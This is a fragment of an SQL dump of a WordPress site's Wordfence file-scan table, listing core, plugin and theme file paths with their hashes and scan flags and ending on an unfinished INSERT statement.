(0x14af454357acee60a960dfdf0e012def, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs', 1, 0x00000000000000000000000000000000, 0x8b5f40e5650feee8e4330ca56294d942, 0xd94ce08bd8a4404ae386394f68479740401f9befaafb5a2186e00038236cd328, '', 0, '?'),
(0x14cea28353cbaac40ab4029642e15622, 'wp-includes/fonts/dashicons.svg', 1, 0x00000000000000000000000000000000, 0x90b2bb03672d9f516946d43fd968d320, 0xc20d71a1198a96f7f819850af59ccc6391c542c70a806e9b85a0b32e21dad0ea, '', 0, '?'),
(0x14ef2a512e09d62d63de25ce10114416, 'wp-content/plugins/wordfence/lib/flags.php', 1, 0x00000000000000000000000000000000, 0x15f61b69efcb63d2e7a3adb59263f02d, 0x38b659b8d6434fe5d7f89930f76a7ba11a78a4a41244f2c496bf149278aa4fa7, '', 0, '?'),
(0x150f98afdca139ee755f5c0ac339c127, 'wp-admin/css/color-picker.min.css', 1, 0x00000000000000000000000000000000, 0x23092c4dff038dd3816799c6316d122d, 0x07e488503fa39b72a20688c8754e5fc90a2df7d4f1445bf42f8eb40081449374, '', 0, '?'),
(0x1510c84b55f567304d55bf2f9af6ca87, 'wp-admin/admin-functions.php', 1, 0x00000000000000000000000000000000, 0x0bd9cc4fdb51a0ec7885240a49944f0b, 0x3ff80f211b146de4805796c1643c32d37c37d2e716babf53450cc93393be7322, '', 0, '?'),
(0x151a5b8160a3b1304349245488a027f7, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php', 1, 0x00000000000000000000000000000000, 0xba29d548beb5240749bb339dbd5e301f, 0x44736d723f761104ca6a7aa185cfed4d6f99333d6230c0059bac0c4bce522306, '', 0, '?'),
(0x1531f745923a85a0d44cbbbb659591fe, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_style_24px.svg', 0, 0x346ec4a1a95dec5c68a1066dd1009412, 0x346ec4a1a95dec5c68a1066dd1009412, 0xf4c7b8fbb0604bd1f8b26f93438e39b106aff5975f6b0bdb780bf7ec38632ebf, '', 0, '?'),
(0x15343b56cff4278c2fb6f2e61ca866ba, 'wp-includes/js/jquery/ui/effect-scale.min.js', 1, 0x00000000000000000000000000000000, 0xbf1461a382afb5a90e22a0d7d462ff92, 0x14ff1a3b5da11c5b2e8e0a92de56170c1497c60e3ee84441f9cdc40fc3d04d13, '', 0, '?'),
(0x153abf66d83f62086a83bf902e8b9fb9, 'wp-content/plugins/wordfence/views/blocking/block-list.php', 1, 0x00000000000000000000000000000000, 0xdfd9f14cc95950cdba4b8bd30a8f65d1, 0xca5dfe534f09ac6f84b982db2a2b7558f53ae5a3e608ca86151fc18cd7779ff8, '', 0, '?'),
(0x153b8ff2a79aea7547421fdcdb6e9c18, 'wp-content/plugins/js_composer/assets/vc/loaders/spinner-light.svg', 0, 0x1be0e48ff3d577609c3cf7b8ac1bb41e, 0x1be0e48ff3d577609c3cf7b8ac1bb41e, 0x442e12272f3c2ca642aa5d8488b518c6743f11fb6342279d8130b0ed4b5897d5, '', 0, '?'),
(0x153ba76291cec0c3eddb9803239e6513, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gravity-forms.svg', 0, 0x91919319a83890113e88bda67c0190c3, 0x91919319a83890113e88bda67c0190c3, 0xc7c24d252e05afa3b5b50497e03b9b7088dce11bf3e52b0648130afbf3583293, '', 0, '?'),
(0x1541cde7a2b67e28ae1062ad276b3787, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_edit_24px.svg', 0, 0x39d530354818d7f8715ef914c2801afc, 0x39d530354818d7f8715ef914c2801afc, 0x8cf4107675023ba6e59bff1bd903e9d7814f3c4ba652ca60d6bdc9d3af9b247e, '', 0, '?'),
(0x1547d86f556a6d0c1f5a4709eca6716f, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_flat_angled_24px.svg', 0, 0x0499e8897ce8ba6c5dc9b9e46466f207, 0x0499e8897ce8ba6c5dc9b9e46466f207, 0x7da4d5cccf9e952e87b5dc976bb62ce2a52fe679d02de351fe6a37e357c9c733, '', 0, '?'),
(0x154e660a326e40346280f86847a0b595, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gauge.svg', 0, 0x65a4c0e84db1b11c0f47f94c1be206bf, 0x65a4c0e84db1b11c0f47f94c1be206bf, 0x0b0aecca464970bfb8e74e7be1643734453fbafdf01e1fe2b2a54bab3e71e8ed, '', 0, '?'),
(0x15520e4d9277a41c7d39477fc476f7bb, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_decrease_24px.svg', 0, 0x232b1cbcab394462dd9ef4d68d5ad1a2, 0x232b1cbcab394462dd9ef4d68d5ad1a2, 0xbf5d6bc20b4f2d7a6422c45428d98f0a21bbe55e22952202ebe0db6a715afc83, '', 0, '?'),
(0x1553c7b707ba9b01e2db82e9e24fcfbd, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_0.php', 0, 0xdb8937caef2b307852b54364d16d57f2, 0xdb8937caef2b307852b54364d16d57f2, 0xd5eccd217306f7be297249df7b176bbf8a94317dc161cd590fcf4d1139aa03c3, '', 0, '?'),
(0x15549ac498355648abacfc501c7bd6f4, 'wp-includes/Requests/Exception.php', 1, 0x00000000000000000000000000000000, 0x879bac9efa180085ab33e90e1acc5249, 0x2d408e8267202588fca7868c02754f0e4e5c7d406ce0b0cc1ba56627bbe3f3bc, '', 0, '?'),
(0x1578aec5d2b1f09827b016c901e00468, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-button2.php', 0, 0x28b996699e6a9735167634c02ca400ff, 0x28b996699e6a9735167634c02ca400ff, 0x777208f1d19498e04d3a1f3d6367ad05256e20838d8dda59d7426827edf75342, '', 0, '?'),
(0x158f16dbde430a8e0c97e455be8416fc, 'wp-admin/js/custom-header.js', 1, 0x00000000000000000000000000000000, 0xbfdfbcd9ca2a53e91e857effb3410f0f, 0x846a0d44796396ca242c8f6abff72129d12b22c47fd0e182384e7023b2760ffc, '', 0, '?'),
(0x159dd91de96bca4b200c7e05526da818, 'wp-content/plugins/revslider/includes/framework/elements-base.class.php', 0, 0x0f7ebe4e027de4638c09dfcc88370ae3, 0x0f7ebe4e027de4638c09dfcc88370ae3, 0x799306c7333eb64ed737b28bbc8af597e4f10b7916f6058c0887ad13dbe82bed, '', 0, '?'),
(0x15a4ca1c306cb1dd6ac630132b25f20e, 'wp-includes/SimplePie/Source.php', 1, 0x00000000000000000000000000000000, 0x8e83bb1de3e018f0537bb32a8c9617ff, 0xaea8ef1db5349586374d6a399d858ae97c00698aff26c4a89eaa4c7521a54ab4, '', 0, '?'),
(0x15b4b28ae40bb379fb42352538e4cdd0, 'wp-content/themes/Impreza/framework/templates/form/submit.php', 0, 0x40cdb57efa35f3b3f35501c302e253f8, 0x40cdb57efa35f3b3f35501c302e253f8, 0x028af16510bc45250015bf0f58e2a6b734999476ea7287da6f24d9bd67d5da03, '', 0, '?'),
(0x15b5425f2ec1a74a12f6c114dedaa3e3, 'wp-content/plugins/revslider/admin/index.php', 0, 0x03efe17b1c4a21753f7d07ee17e77395, 0x03efe17b1c4a21753f7d07ee17e77395, 0x4175cc83b59cc460fc3989377d628e3e4d48ea0ec302ed4a4868e5fbce7c466a, '', 0, '?'),
(0x15e7207d4b1093aea0324e85f81adcc4, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.kenburn.min.js', 0, 0x997b6ba2eaeae294cfeb89f12725a4c7, 0x997b6ba2eaeae294cfeb89f12725a4c7, 0xffd9875f668681742d4f2b679ff159252dcd1d8838c979f4ea4af414aeebafe2, '', 0, '?'),
(0x15fbf7dee7aa92b775a3a10d5a4a572b, 'wp-content/plugins/wordfence/images/help.png', 1, 0x00000000000000000000000000000000, 0x244ec7fc3b27fd874dcfcff9f2205901, 0x96efe91ab23700d9e9a472c2802f69a3d27a3b6b692c9b3d4c9b5abf67998d99, '', 0, '?'),
(0x15fc1829a7a3998a740dee2cbd4adabc, 'wp-admin/options-permalink.php', 1, 0x00000000000000000000000000000000, 0x0bf63e1bda5632632c0d848d37ffcb6a, 0x5282c0a2bed45f41841190ee1db3d323301481c7ed52c432a4d93c6972bc9efc, '', 0, '?'),
(0x1610100d8055ebcfdd7a4ad3a2df4245, 'wp-content/plugins/js_composer/include/templates/params/options/templates.html', 0, 0x91eb7a4feaff7716eba4be46aed0742e, 0x91eb7a4feaff7716eba4be46aed0742e, 0x829c5b6fe01340b999e0ac7751198945af0adc2bf44fbcabd651fd78365f9906, '', 0, '?'),
(0x1614f63fc784a3f980eb3a0ade1fd658, 'wp-includes/customize/class-wp-customize-theme-control.php', 1, 0x00000000000000000000000000000000, 0x26a80c022d65494307f659af8563e692, 0x7e85d6c62fe44a30574c680bba91aafd60dc3353b99ab4e6c159127d645bca92, '', 0, '?'),
(0x161a0eb4f029209425697983ceb40207, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php', 1, 0x00000000000000000000000000000000, 0x7d2b237a2caf04e865df0672454a192d, 0x7366badc7140b5da38bc217957a526da944107c82b2fc5755995869c34349c47, '', 0, '?'),
(0x162c4cdba5b2b91fbc4b8c2e9eac22ce, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools2.svg', 0, 0xd4ed120c12d18e07f1ab530e8b96d150, 0xd4ed120c12d18e07f1ab530e8b96d150, 0xd129c89bb505bf93eb59e5f016f9133cc864e0d52e91375d0ad65cd54d789db6, '', 0, '?'),
(0x16339564fda483e2796ae4e9dfcef356, 'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php', 1, 0x00000000000000000000000000000000, 0xe95b3ffb1ebbe77f203fa2ac138797dd, 0x0196627d5354bd0c1de5d1068e1bcc62637697ca848fc18bb8d3f6822fc37bd2, '', 0, '?'),
(0x1647f29870b4464bff293669ce071538, 'wp-content/plugins/js_composer/include/templates/pages/partials/_settings_tabs.php', 0, 0xb58134106758be7a7d7abbfe68955ee3, 0xb58134106758be7a7d7abbfe68955ee3, 0x7b192114e63bcd2922802b184be14615396ab5ed8b88c29e29203a94d6882fdb, '', 0, '?'),
(0x164ea38f4a3404907d73913bb88fd55b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-globe.svg', 0, 0xd1e75c29da4004e75a5dc0be72ce1bce, 0xd1e75c29da4004e75a5dc0be72ce1bce, 0x5a55c86e5223e862c980b7f27d0bec76c94c9dea10c1b339ab248990e1496cb4, '', 0, '?'),
(0x16576c85d8793acf00566e6084640096, 'wp-includes/js/tinymce/plugins/wpview/plugin.min.js', 1, 0x00000000000000000000000000000000, 0x0f1c45aeab591060112ce9ff3f7f4ace, 0x6c9611a840a2967cf8f13cc6e8cfb0be7afb625da23db7e9ec5451641c4e00b3, '', 0, '?'),
(0x1658480f88e1b81dff9e52dd29491b36, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_speaker_notes_24px.svg', 0, 0x8350a9eb83231d716200e7265b2f34be, 0x8350a9eb83231d716200e7265b2f34be, 0x2db1db2d5d4e558f0ac60702af3f3a49b3051730983b03dfc9352d9a310c8041, '', 0, '?'),
(0x16659bd08e3d05774dda1b8cbc5b7629, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-info.svg', 0, 0x08beb242dbbed3b80d79aac880b76025, 0x08beb242dbbed3b80d79aac880b76025, 0xae8b2f7a014cc04e4761e6d4b709e206edacd7f543932bfba4a2ad4871028e5d, '', 0, '?'),
(0x1685a806f9febeab595a3c59a877c542, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_zigzag.php', 0, 0xa8f00b468be68ccd152942133e5cbb07, 0xa8f00b468be68ccd152942133e5cbb07, 0x5863f07adc42ee68846b815bb662ea13f9c1894e759170d1928f03e91cf261cb, '', 0, '?'),
(0x168c1c2c903423a28528e7230c170614, 'wp-signup.php', 1, 0x00000000000000000000000000000000, 0xe3692748d8fda1c64a4b967a6f496aa6, 0x63a1b9a45f78223191be48c231c82a1ef4877a3467305e843d7f2ec61f2abb7e, '', 0, '?'),
(0x16c113a521f01f6df599ca1c4c5c4662, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_24px.svg', 0, 0x764a1004ecabbb0c368942124872b37c, 0x764a1004ecabbb0c368942124872b37c, 0xa7c79c106b8346ead84baa7d736982e77ae09e6d57c7f1be663bf47e06639dca, '', 0, '?'),
(0x16c20dedf4a26639f2e9404bb02b0d58, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_circle_24px.svg', 0, 0xd6dd7111bc66b2286c933ef3ec267537, 0xd6dd7111bc66b2286c933ef3ec267537, 0x43628b95f115ee64a36bca3d7476b840a73ccad878ffd853b3674194c681830a, '', 0, '?'),
(0x16c7969a8964c321733c58a7e499d0af, 'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php', 1, 0x00000000000000000000000000000000, 0xec2a95317b2ccbbef2fe961bca829cce, 0x3c9547b2c6eb24b5552bf61f6bc54c3e040068970f61684206a6ac5308a92ddb, '', 0, '?'),
(0x16d38bd49a1395286a8d947e54e05db1, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phone_24px.svg', 0, 0x3857464b453fda6d17b75402cc4476c0, 0x3857464b453fda6d17b75402cc4476c0, 0xe45431a5071178e70cec8d2ebccf17da177e638345f362d48f471e419feb9376, '', 0, '?'),
(0x16d725d6e8783c03b2a1b99c832bb9bf, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_color_lens_24px.svg', 0, 0x98af8c200af61dd68e0ec419b3f6265c, 0x98af8c200af61dd68e0ec419b3f6265c, 0xc0954b17f953841cc35f8fb7f5bc7aeedd9e9256e0ee5f939e9883d05e2bfdc6, '', 0, '?'),
(0x16f0f72ae6b2ab9e015110f387ffa54e, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php', 1, 0x00000000000000000000000000000000, 0x1192fe3104684962db938bd7e9d861ff, 0x36b74ea39b534e1359819e326dc305d23def1440de176b652821a67a7c891b67, '', 0, '?'),
(0x16f6cc3d3cb8451e2d17a42c403c38a3, 'wp-content/plugins/js_composer/include/autoload/vc-pages/page-design-options.php', 0, 0x16bb065295adf3b45c31fbaa22584bac, 0x16bb065295adf3b45c31fbaa22584bac, 0xfa29fad246a12337d162caedb08e690d00601cc787f17275b112cada44f10356, '', 0, '?'),
(0x1701b8ae00510df0d1424aa9cc25af0e, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_mail_24px.svg', 0, 0x3176293a03ae0fcea25867f375898c30, 0x3176293a03ae0fcea25867f375898c30, 0xf45e23c39be38d777afabde9aa738bfdce6e7b9dc2d1ac08222c2db069dd69b4, '', 0, '?'),
(0x1707818d7937afd01f4d41e440a09a85, 'wp-includes/widgets/class-wp-widget-rss.php', 1, 0x00000000000000000000000000000000, 0x43bdaeee1d0d4d4e32e04a00cb4ae125, 0xca8b361e7013193765c090bb45b4636959f0e9b53fe11cb335c569861dd421da, '', 0, '?'),
(0x170dae441536beb509c9c643a8de4f55, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_fancy_text.php', 0, 0x2307786d64e07d3f84cbcc98776c8ce7, 0x2307786d64e07d3f84cbcc98776c8ce7, 0x74631bd0873c379773c97375786b0d66d0f60867cb8c244ac410a90f60de68fc, '', 0, '?'),
(0x1714eefb23a0605c9c547bc588c27716, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pregnant_woman_24px.svg', 0, 0x72e0d14afd4655d98e22cd9953c27334, 0x72e0d14afd4655d98e22cd9953c27334, 0x14824da3607323ab9e4f48f8987ee2a161bd8dd38da628c5e970e9254c645905, '', 0, '?'),
(0x17179a5f2930647c89151e365f843b6e, 'wp-includes/js/dist/rich-text.js', 1, 0x00000000000000000000000000000000, 0x69c199809f214dea6dea7019d9b4b9c1, 0x6168b40de5524bf2d04176b1dfb994542d71d4e4b60878c21909d8443130462a, '', 0, '?'),
(0x172332bf066f4dd761b89f11c7e512f5, 'wp-content/themes/Impreza/functions/migrations/us_migration_5_2.php', 0, 0x952605aac1258d4381651542c9a8ff3e, 0x952605aac1258d4381651542c9a8ff3e, 0x1d056adbeb0531892e5a4dcd52f5e8aee640412f741a5c115f56da967e69537b, '', 0, '?'),
(0x1726d1414e60a385ac6ddac8bb51827e, 'wp-content/themes/Impreza/framework/templates/ebuilder.php', 0, 0x39124c0f0f56f575668dcff07e4815d2, 0x39124c0f0f56f575668dcff07e4815d2, 0x493812e1b3bbdfe169bebf41cf2aeebd994237cff96644d41b273e1b52041144, '', 0, '?'),
(0x1734726a82924d975134b3a3e25aa458, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design04.php', 0, 0xed8e929e88aa1f18d344b3c03effe5ea, 0xed8e929e88aa1f18d344b3c03effe5ea, 0xa9ea9da498e0f631b41ea7800b3555b754da31bca318d68bebee307359f18bf6, '', 0, '?'),
(0x173d4efe4b286c238bc6bce66365c138, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-money.svg', 0, 0x5b5605b574330db26eb27ee843c214d6, 0x5b5605b574330db26eb27ee843c214d6, 0xa5dd9ce501ec98fe707720f707abfb5e3d067caaa78ed355789be0abbc792e4e, '', 0, '?'),
(0x173f756de24f50e75087a31b84025d42, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_late_24px.svg', 0, 0x0b4a407d5018d18588cc353cf91e960a, 0x0b4a407d5018d18588cc353cf91e960a, 0x3281c723d099dbc8fff8569c2e53a8dfca23d47838b865121d9d9f7506ff137a, '', 0, '?'),
(0x174c8d9ae5924b0baf4a2c0bb392c4b6, 'wp-content/plugins/js_composer/include/autoload/hook-vc-pie.php', 0, 0x4d1a22f85557083285c6e36f28f04c19, 0x4d1a22f85557083285c6e36f28f04c19, 0xc1e689a147bbd5c4c395c607155988f270c9ccb986c211fdaa0a32bb17770d08, '', 0, '?'),
(0x175fd6a92ccc278665a408e17eb32927, 'wp-content/maintenance/assets/images/twitter.svg', 0, 0xdd4f8165e570755b63fbdecbe8517310, 0xdd4f8165e570755b63fbdecbe8517310, 0xf719529bad9928db232e49ebec9110f4cb18cb7d8973df5a4b7d5121d76939d4, '', 0, '?'),
(0x176ab1b7789168e579b97056ced52621, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_24px.svg', 0, 0xa9206d27b6c32c29b4f47ca5c9a0667a, 0xa9206d27b6c32c29b4f47ca5c9a0667a, 0x2167b758eedb09de4591ccd5314d2a98f75099b059033b132ca3095aba4919cf, '', 0, '?'),
(0x1775a81845a57aed2179fa1f5372b9ba, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator3.svg', 0, 0x0e53f8780be12201c921778e4a562485, 0x0e53f8780be12201c921778e4a562485, 0x44329445830e7f3b9f175571c40f36d22805f7affe6a35bd6e6a303bf0c820db, '', 0, '?'),
(0x1788602625651f469567c09c94f39464, 'wp-content/plugins/wordfence/models/block/wfBlock.php', 1, 0x00000000000000000000000000000000, 0xb2aac07aa4966e18b1f4b88e4b5fd51b, 0xa701a1d8f03759e0172e80da94fbeffbac6e0feab52182da921a6517e9efbbf6, '', 0, '?'),
(0x178b0751736e6f351d584df6ddbd0c5a, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_tilt_shift_24px.svg', 0, 0x19894321209ca05ce09ece94c4b31baa, 0x19894321209ca05ce09ece94c4b31baa, 0x3cc19c091ef600d656cf83986507c8aa32fbc2a9fb9626d3b10c1c2a746b3098, '', 0, '?'),
(0x178f35fb323d0aa111eb88b272e8d132, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_component_24px.svg', 0, 0x877104c560b9ff795f2d4b0f63cc5cb7, 0x877104c560b9ff795f2d4b0f63cc5cb7, 0x76412d0fa5046953bd66f3db45d7245966b3e6b57ba89f0eb782a4327fedeeae, '', 0, '?'),
(0x1797ab85a76618735145eb5fc9c95d66, 'wp-content/plugins/wp-super-cache/wp-cache-config-sample.php', 1, 0x00000000000000000000000000000000, 0xc593f7b32a20223541f6d7456cf321c1, 0x0687e7468fc53fae2c19540f43cbf816b4fd269bfc0a2122be79dab2abccd5de, '', 0, '?'),
(0x17a93a38cf1f4961f617b9c3b86cd56d, 'wp-admin/includes/class-ftp-pure.php', 1, 0x00000000000000000000000000000000, 0x06c43882160dee5a21c8be34fa1edc4d, 0x802cd80966292aa4291a4ac99341ea7e4fbd476d3397b446bb299f3237dad3d0, '', 0, '?'),
(0x17b2fea3b24b714d8dc3e47b83b1bb03, 'wp-admin/css/dashboard.css', 1, 0x00000000000000000000000000000000, 0x6de79274a839f563f9c4233eaf2c41d0, 0x795677446e41d6c475663b2180b49d83b713126d56238381b8c626e04c439094, '', 0, '?'),
(0x17b7c673dd9c93c39e33878ccff4fed7, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php', 1, 0x00000000000000000000000000000000, 0x4e8d63a5dc30ab29d7a05a3bc162dae6, 0x354b97eba5f3aae7c94f89a6ffe11735b49c514a0b10c2c382507055ce0257be, '', 0, '?'),
(0x17ba7b785ac663f91122866862913fca, 'wp-includes/js/dist/dom.min.js', 1, 0x00000000000000000000000000000000, 0x05964cc1e69f018147aeda2b60d4c2ec, 0xb0f61771ac6173f3694c055b9bbee1b83d9aea175de3757309c78e001712126e, '', 0, '?'),
(0x17c254429ba44f3edf7632edee7d4561, 'wp-includes/SimplePie/Locator.php', 1, 0x00000000000000000000000000000000, 0x8073a4c6da1bb33b877576665ef5eab5, 0x3cb9ce8c17f73a39a92f285c8fd68e0374186c83170e5dd7c7b35e381132e6f7, '', 0, '?'),
(0x17cfca54a31a5ae2cee653e7aa0eb53e, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_24px.svg', 0, 0x90029005119148f5901ec38a5e23ab8e, 0x90029005119148f5901ec38a5e23ab8e, 0x81eb975cc5f0cf36b0e4982e07b67f5e448e8ecfaa7e7c99db082cf73ccb7901, '', 0, '?'),
(0x17d063cf7cabf931156cd07b4eb2a5a9, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fast_rewind_24px.svg', 0, 0x90022fa32be10411b7da0870ac3740ab, 0x90022fa32be10411b7da0870ac3740ab, 0x1f3a46bcc17f97ab1256b91a0e136edf512e79d6e357c04cfaee1785becf6956, '', 0, '?'),
(0x17e0e357d04d466033ccdc24f7e61d0f, 'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php', 1, 0x00000000000000000000000000000000, 0x13f907795ef2a5f5b19b909ec1d711a9, 0x590951e21e461e1f58a7c632b332ee4657b69f0bf929eb0b93c5664b531b66f1, '', 0, '?'),
(0x17f6de012aca370de7e6183fe1b6fd0f, 'wp-includes/class-requests.php', 1, 0x00000000000000000000000000000000, 0x2fbfaa9d388a7eb99cceeb573102c4e1, 0x0ce217f6fc0c38a48b3d07421cc9e8d3b9e5ad0c65d7aeb3f92c787b1aad2fc4, '', 0, '?'),
(0x181cdb56d0a42a0cafe43fde2949a58c, 'wp-content/themes/Impreza/framework/templates/form/checkbox.php', 0, 0xf6601c3fc0003b95f191a47c84b2da18, 0xf6601c3fc0003b95f191a47c84b2da18, 0xbafbcff91de3e6aeb2df9bf126dbcc4b6c9baa15fac624f1199cf84715c63fe0, '', 0, '?'),
(0x181db46f663fde33a8500bbf31f222e2, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php', 1, 0x00000000000000000000000000000000, 0x670122cca4112f184f949bec59a2b727, 0xca38e665ea549b65740d206a189c50f72fa5c04ae41086993c5ebe72d3a57a12, '', 0, '?'),
(0x18308c56d9520973e436d6eb07d8739b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart13.svg', 0, 0xc9a30f43e99d31831e1f7dc0397c450f, 0xc9a30f43e99d31831e1f7dc0397c450f, 0x7313aad8bfbb9b389ecc38e6afde966ec351b16df2d2e40c6da2847cf01900c8, '', 0, '?'),
(0x1830a6669ef417c9bbddab97ec0f9219, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_9.php', 0, 0xe090fa83b50ab73cdd116455a0c877e4, 0xe090fa83b50ab73cdd116455a0c877e4, 0x97245b2bfbebc1f2d971e5a2551e635583ccfda47f2e0827a363d501b02ab0ba, '', 0, '?'),
(0x1839526288643c4da66f405c11c0643d, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_low_24px.svg', 0, 0x16c410307caeb1f78fd7fe4da2dcb99c, 0x16c410307caeb1f78fd7fe4da2dcb99c, 0xabcaf8ea199374dfd2d0ca3ddecf5d268b64e17d717a376df4f3e06e1fee1b75, '', 0, '?'),
(0x1846abd2657fc0fbd67ded28b71be5bf, 'wp-includes/js/jquery/ui/dialog.min.js', 1, 0x00000000000000000000000000000000, 0xd0933f1e5b9b5592dd5e219f7eba2f14, 0xa88232cf3e6eeb8a5ac8eadf5c465d674fc7e5bffa7b1cf851b31d3663fc4b5f, '', 0, '?'),
(0x184f23dc7188b1b2fa36894b9255c91f, 'wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js', 0, 0x5a627237805ba8fde358e571c3333197, 0x5a627237805ba8fde358e571c3333197, 0xc863660bb9431948f86eb84a04ead6edc531c154d637d23fce015b31ef23fd67, '', 0, '?'),
(0x186931fc9e457e4eac49e241cd94e0c6, 'wp-includes/Requests/Cookie/Jar.php', 1, 0x00000000000000000000000000000000, 0xe9300c5fb1f52670a0b52234d95c9510, 0x63f7e421c22342a769192a2b22f60db96e9af7e749c688bc58c389fa1fca77d9, '', 0, '?'),
(0x187384eb7baf2fa8aa541beff0db3c55, 'wp-content/themes/Impreza/framework/js/jquery.royalslider.min.js', 0, 0x84abf6bb6e46b6a6cdb299115f59b6e7, 0x84abf6bb6e46b6a6cdb299115f59b6e7, 0xf70da036ace1577089208bd829098d436e5527dc78176c32c95e30fbabaa85e0, '', 0, '?'),
(0x1873e299bc7b4452cc5ba56bd931fb49, 'wp-content/plugins/wordfence/images/logo.png', 1, 0x00000000000000000000000000000000, 0xb67a4689e5de80570bd50d6ce17e3617, 0x56c97b938951390fef5609b186e6fcb0b7124a0958160299718886d6da806393, '', 0, '?'),
(0x1889f461d428cf285a3726f3ba8ee146, 'wp-content/plugins/wordfence/js/date.1579191227.js', 1, 0x00000000000000000000000000000000, 0x7f8cf4d56a9dbd50be4552d05faf63c0, 0x8f80420c3debe83006d51f64c6a9224289745563a8b95e1c31803e9671260bf8, '', 0, '?'),
(0x188ac8e0fdd7582f0ff7db00fe830f09, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php', 1, 0x00000000000000000000000000000000, 0xfaedda36eb92d9a4708fb8054f6c5e12, 0x4cc2d52a63e4261ab7b25dfe0a3975d290c3b307974cf15f88f951106a267686, '', 0, '?'),
(0x18914e334d08b20aa3c353bfec306a16, 'wp-includes/js/dist/block-library.min.js', 1, 0x00000000000000000000000000000000, 0x27a78ec28594f9c11c1a5b2a58783ce0, 0x5737fc6e44e7c4ceeba7d6e9ffd4497347bc363e19c959ef8b7a5e91a0095148, '', 0, '?'),
(0x18d178289bc5a5dcba842e92f5c6d587, 'wp-includes/class-wp-session-tokens.php', 1, 0x00000000000000000000000000000000, 0xc2fcecaae71a42274bd27df03c7957ce, 0x5c1ac789c811ce2605e4219aa2b2cb7027c6157cb79321d9e23bbc82cd09b090, '', 0, '?'),
(0x18d492d7e3be419f95d7d9f972ab8e5e, 'wp-includes/js/wp-custom-header.js', 1, 0x00000000000000000000000000000000, 0x284b8547296847f3521f043cf87cdb34, 0x607b5412d2a8f5c1ba02c88fa7c52b8785fddb90c3740bbad6066099c303a01c, '', 0, '?'),
(0x18dc5e3070f01cf98af26bfa83a1814d, 'wp-includes/css/dist/nux/style-rtl.css', 1, 0x00000000000000000000000000000000, 0x067f1fa67dc68c39b293875357a49b0f, 0xdcbb6306c0deb83e7c09054f3ad48abde4fe30c836f865a0fb241970436514e0, '', 0, '?'),
(0x18e5855309afb614c612a167094e9664, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php', 1, 0x00000000000000000000000000000000, 0x798c8b5da1341ecc78224477035e11fa, 0x5335a1865f27e78e9a459b87539a2d31ede9574db44cb46aced2755ee3c75d63, '', 0, '?'),
(0x18e6d3c4681f5d08878243f980b2412a, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php', 1, 0x00000000000000000000000000000000, 0x5a624ffa883686afa7a54963448f808e, 0xfd8e6075fe64c7f365e63f73a237a1fed164c443eaa4517d59acd7e32f9e87d3, '', 0, '?'),
(0x18eb3004dc9aeeb95ab449b7e4b8b14e, 'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php', 1, 0x00000000000000000000000000000000, 0x279955e5b783fcd6207144de46eecf48, 0xd2ebcdd4a6c4218dd91806f082d3a2744cdc6b2ebe2231dde4436dbb4b67a37f, '', 0, '?'),
(0x18f433750b9e86764bd1ae669fc7b6bb, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/binoculars.svg', 0, 0xb97a3efb9d976adfa121f8585ba8d047, 0xb97a3efb9d976adfa121f8585ba8d047, 0x54a38d2d961e1d01a745967d3a758a308d5d0bdcfa640bc52f8efcffd033e421, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
